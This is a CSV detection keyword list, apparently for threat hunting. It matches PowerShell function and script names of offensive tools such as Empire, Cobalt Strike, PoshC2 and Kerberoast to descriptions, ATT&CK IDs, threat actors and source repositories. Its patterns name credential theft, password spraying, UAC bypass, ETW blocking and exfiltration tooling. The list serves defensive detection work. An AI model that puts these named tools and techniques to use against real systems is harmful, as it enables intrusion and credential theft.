+"*Invoke-ApplicationsOnStartupCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-ARPScan*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-ARPScan.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*invoke-arpscan*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-ARPScan.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1077","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-ASREPRoast*","offensive_tool_keyword","ASREPRoast","Project that retrieves crackable hashes from KRB5 AS-REP responses for users without kerberoast preauthentication enabled. ","T1558.003","TA0006","N/A","N/A","Credential Access","https://github.com/HarmJ0y/ASREPRoast","1","1","N/A","N/A","2","180","57","2018-09-25T03:26:00Z","2017-01-14T21:07:57Z" +"*InvokeAssembly.x64.dll*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*Invoke-AutoKerberoast*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","1","71","20","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z" +"*Invoke-AzElevatedAccessToggle*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*Invoke-AzRESTBastionShareableLink*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*Invoke-AzureEnum.ps1*","offensive_tool_keyword","Invoke-AzureEnum","This cmdlet is used to perform users enumeration against Azure","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/tobor88/PowerShell-Red-Team/blob/master/Invoke-AzureEnum.ps1","1","1","N/A","N/A","5","417","85","2023-04-05T22:03:19Z","2019-11-20T22:07:50Z" +"*Invoke-AzurePasswordSpray*","offensive_tool_keyword","Invoke-AzurePasswordSpray","This cmdlet is used to perform a password spray attack against Azure accounts using legacy Basic Authentication","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/tobor88/PowerShell-Red-Team/blob/master/Invoke-AzurePasswordSpray.ps1","1","1","N/A","N/A","5","417","85","2023-04-05T22:03:19Z","2019-11-20T22:07:50Z" +"*Invoke-AzureRmVMBulkCMD.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*Invoke-AzVMBulkCMD.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*Invoke-BackdoorLNK*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BackdoorLNK.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-BackdoorLNK*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1115","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-BadPotato*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-BadZure*","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/mvelazc0/BadZure/","1","1","N/A","5","4","302","18","2023-07-27T15:40:41Z","2023-05-05T04:52:21Z" +"*Invoke-BetterSafetyKatz*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Binary *.exe*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3763","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z" +"*Invoke-BitlockerCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-BlockETW*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-BlockETW*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*InvokeBloodHound*","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/C0axx/AggressorScripts","1","0","N/A","10","10","37","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z" +"*Invoke-BloodHound*","offensive_tool_keyword","bloodhound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1552 - T1027 - T1059 - T1087","TA0003 - TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","1","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" +"*invoke-bloodhound*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-BloodHound*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"*Invoke-Bof *","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/airbus-cert/Invoke-Bof","1","0","N/A","10","10","232","32","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z" +"*Invoke-Bof.ps1*","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/airbus-cert/Invoke-Bof","1","1","N/A","10","10","232","32","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z" +"*Invoke-BruteAvailableLogons*","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","1","N/A","N/A","2","113","21","2022-03-04T14:12:08Z","2021-12-01T09:40:22Z" +"*Invoke-BruteForce*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-BruteLogonAccount*","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","1","N/A","N/A","2","113","21","2022-03-04T14:12:08Z","2021-12-01T09:40:22Z" +"*Invoke-BruteLogonList*","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","1","N/A","N/A","2","113","21","2022-03-04T14:12:08Z","2021-12-01T09:40:22Z" +"*Invoke-BSOD*","offensive_tool_keyword","Invoke-BSOD","A PowerShell script to induce a Blue Screen of Death (BSOD) without admin privileges. Also enumeartes Windows crash dump settings.","T1561 - T1059","TA0002 - TA0008 - TA0011","N/A","N/A","Exploitation tools","https://github.com/peewpw/Invoke-BSOD","1","0","N/A","N/A","3","265","73","2018-04-03T13:36:45Z","2018-03-30T14:20:10Z" +"*Invoke-BuildAnonymousSMBServer -*","offensive_tool_keyword","Invoke-BuildAnonymousSMBServer","Use to build an anonymous SMB file server","T1570 - T1027 - T1071.001","TA0010","N/A","N/A","Data Exfiltration","https://github.com/3gstudent/Invoke-BuildAnonymousSMBServer","1","0","N/A","6","3","222","43","2021-08-20T14:52:10Z","2021-07-10T01:23:43Z" +"*Invoke-BuildAnonymousSMBServer.ps1*","offensive_tool_keyword","Invoke-BuildAnonymousSMBServer","Use to build an anonymous SMB file server","T1570 - T1027 - T1071.001","TA0010","N/A","N/A","Data Exfiltration","https://github.com/3gstudent/Invoke-BuildAnonymousSMBServer","1","1","N/A","6","3","222","43","2021-08-20T14:52:10Z","2021-07-10T01:23:43Z" +"*Invoke-BypassUAC*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BypassUAC.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-BypassUAC*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1123","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-CallbackIEX*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerBreach.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Carbuncle*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Cats -pwds*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*Invoke-Cats.ps1*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*Invoke-Certify*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Certify*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*invokechecklocaladminaccess*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 